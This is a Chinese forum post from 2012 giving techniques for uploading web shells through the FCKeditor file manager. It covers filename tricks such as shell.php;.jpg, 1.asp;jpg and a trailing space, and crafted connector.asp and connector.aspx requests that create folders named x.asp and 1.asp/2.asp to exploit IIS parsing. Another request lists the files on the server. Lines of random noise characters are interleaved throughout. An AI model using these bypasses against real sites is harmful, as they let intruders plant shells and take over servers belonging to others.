很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
. \& T) I0 |% j! l0 R, J' `7 P) _+ l$ X/ @# S( V
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。0 }& |$ Q* A; a: H7 t
, S0 `; i! P8 V1 j: s( C' m
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
% e( N3 P0 F, i- s$ {2 M9 n: V V. O5 [4 F- P2 h5 J1 I8 u. w
突破建立文件夹:" V. G f! ^- L& S5 a
4 Q* f# Q7 ]: P/ w7 ?) I# `5 x
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
& d; D' A* L, F# p* ~6 G6 P/ F2 X* o6 |6 J! b! s, z4 Y$ L
参数:
7 i5 K( J6 f1 z1 _
8 _, ?- M3 |* g4 G! T9 {. A. Q当前目录名:CurrentFolder=/qing.asp3 I2 g4 H# {, j; v3 _# \9 E$ x
1 T; O) K. e: g* A! l* I. R% A新的目录名:NewFolderName=x.asp. W$ P2 E0 J" ^& p/ y6 ~' _% R
5 _8 d6 f, O: H. v其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
; a2 ?2 R5 r, b' N7 A, h$ u7 t$ @, J4 _9 H2 w
那么 x.asp 就已经建立生成了,此方法百试百灵!
7 v/ g3 g1 R0 l; @; e# R" t& a3 s; y) V( W, G1 F; f6 i6 d
新建文件夹参数 x.asp,基本都能搞定。1 m% ~5 w6 `2 T! I% q8 ?& [4 e+ T
' Z+ u# j, l& i( Z$ Q4 `! t
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建# L [& l1 q0 d5 h# s, V* c; s
3 ?" |4 H) c2 {$ z4 d: ]3 P1 n$ H% _
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
" I$ N* `* X5 W+ j. H2 B) d8 W8 w1 D! m/ p" \
获取文件列表
& R1 d, A2 M$ D1 e aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/ R/ S/ Z% s3 T, z/ o7 u# f
4 o! |9 O8 Y/ f! w! k( O+ { |
发表于 2012-12-31 09:27:09
收藏
支持
反对